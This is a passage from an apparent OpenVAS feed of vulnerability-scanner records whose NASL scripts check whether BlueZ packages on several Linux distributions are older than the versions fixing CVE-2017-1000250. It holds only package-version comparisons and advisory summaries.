like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bluez on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:2685\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-September/022531.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-alsa\", rpm:\"bluez-alsa~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-compat\", rpm:\"bluez-compat~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-cups\", rpm:\"bluez-cups~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-gstreamer\", rpm:\"bluez-gstreamer~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs-devel\", rpm:\"bluez-libs-devel~4.66~2.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310843301", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843301", "type": "openvas", "title": "Ubuntu Update for bluez USN-3413-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3413_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for bluez USN-3413-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843301\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 07:16:53 +0200 (Wed, 13 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for bluez USN-3413-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bluez'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that an information\n disclosure vulnerability existed in the Service Discovery Protocol (SDP)\n implementation in BlueZ. A physically proximate unauthenticated attacker could\n use this to disclose sensitive information. (CVE-2017-1000250)\");\n script_tag(name:\"affected\", value:\"bluez on Ubuntu 17.04,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3413-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3413-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.04|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bluez\", ver:\"4.101-0ubuntu13.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:amd64\", ver:\"4.101-0ubuntu13.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:i386\", ver:\"4.101-0ubuntu13.3\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.43-0ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:amd64\", ver:\"5.43-0ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:i386\", ver:\"5.43-0ubuntu1.1\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.37-0ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:amd64\", ver:\"5.37-0ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libbluetooth3:i386\", ver:\"5.37-0ubuntu5.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:37:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191378", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191378", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-1378)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1378\");\n script_version(\"2020-01-23T11:40:56+0000\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:40:56 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:40:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for bluez (EulerOS-SA-2019-1378)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1378\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1378\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'bluez' package(s) announced via the EulerOS-SA-2019-1378 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An information-disclosure flaw was found in the bluetoothd implementation of the Service Discovery Protocol (SDP). A specially crafted Bluetooth device could, without prior pairing or user interaction, retrieve portions of the bluetoothd process memory, including potentially sensitive information such as Bluetooth encryption keys.(CVE-2017-1000250)\");\n\n script_tag(name:\"affected\", value:\"'bluez' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-29T20:07:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive information\nfrom the bluetoothd process memory. This vulnerability lies in the processing\nof SDP search attribute requests.", "modified": "2020-01-29T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891103", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891103", "type": "openvas", "title": "Debian LTS: Security Advisory for bluez (DLA-1103-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891103\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-1000250\");\n script_name(\"Debian LTS: Security Advisory for bluez (DLA-1103-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00020.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"bluez on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.99-2+deb7u1.\n\nWe recommend that you upgrade your bluez packages.\");\n\n script_tag(name:\"summary\", value:\"The SDP server in BlueZ is vulnerable to an information disclosure\nvulnerability which allows remote attackers to obtain sensitive information\nfrom the bluetoothd process memory. This vulnerability lies in the processing\nof SDP search attribute requests.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"bluetooth\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-alsa\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-audio\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-compat\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-cups\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-dbg\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-gstreamer\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-pcmcia-support\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"bluez-utils\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libbluetooth-dev\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libbluetooth3\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libbluetooth3-dbg\", ver:\"4.99-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310873368", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873368", "type": "openvas", "title": "Fedora Update for bluez FEDORA-2017-fe95a5b88b", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_fe95a5b88b_bluez_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for bluez FEDORA-2017-fe95a5b88b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873368\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 07:41:48 +0200 (Thu, 14 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bluez FEDORA-2017-fe95a5b88b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bluez'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bluez on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-fe95a5b88b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AWVMZIXGZ564SXHHRWGEALD7LRSJGI5Q\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.46~6.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "Check the version of bluez", "modified": "2019-03-08T00:00:00", "published": "2017-09-14T00:00:00", "id": "OPENVAS:1361412562310882767", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882767", "type": "openvas", "title": "CentOS Update for bluez CESA-2017:2685 centos7", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_2685_bluez_centos7.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for bluez CESA-2017:2685 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882767\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-14 07:16:10 +0200 (Thu, 14 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000250\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bluez CESA-2017:2685 centos7\");\n script_tag(name:\"summary\", value:\"Check the version of bluez\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The bluez packages contain the following\nutilities for use in Bluetooth applications: hcitool, hciattach, hciconfig,\nbluetoothd, l2ping, start scripts (Red Hat), and pcmcia configuration files.\n\nSecurity Fix(es):\n\n * An information-disclosure flaw was found in the bluetoothd implementation\nof the Service Discovery Protocol (SDP). A specially crafted Bluetooth\ndevice could, without prior pairing or user interaction, retrieve portions\nof the bluetoothd process memory, including potentially sensitive\ninformation such as Bluetooth encryption keys. (CVE-2017-1000250)\n\nRed Hat would like to thank Armis Labs for reporting this issue.\");\n script_tag(name:\"affected\", value:\"bluez on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:2685\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-September/022535.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"bluez\", rpm:\"bluez~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-cups\", rpm:\"bluez-cups~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-hid2hci\", rpm:\"bluez-hid2hci~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs\", rpm:\"bluez-libs~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bluez-libs-devel\", rpm:\"bluez-libs-devel~5.44~4.el7_4\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000250"], "description": "An information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker to\nobtain sensitive information from bluetoothd process memory, including\nBluetooth encryption keys.", "modified": "2019-03-18T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310703972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703972", "type": "openvas", "title": "Debian Security Advisory DSA 3972-1 (bluez - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3972.nasl 14280 2019-03-18 14:50:45Z cfischer $\n#\n# Auto-generated from advisory DSA 3972-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703972\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-1000250\");\n script_name(\"Debian Security Advisory DSA 3972-1 (bluez - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 00:00:00 +0200 (Wed, 13 Sep 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3972.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(9|8)\");\n script_tag(name:\"affected\", value:\"bluez on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 5.23-2+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 5.43-2+deb9u1.\n\nWe recommend that you upgrade your bluez packages.\");\n script_tag(name:\"summary\", value:\"An information disclosure vulnerability was discovered in the Service\nDiscovery Protocol (SDP) in bluetoothd, allowing a proximate attacker to\nobtain sensitive information from bluetoothd process memory, including\nBluetooth encryption keys.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"bluetooth\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-cups\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-dbg\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-hcidump\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-obexd\", ver:\"5.43-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"bluez-test-scripts\", 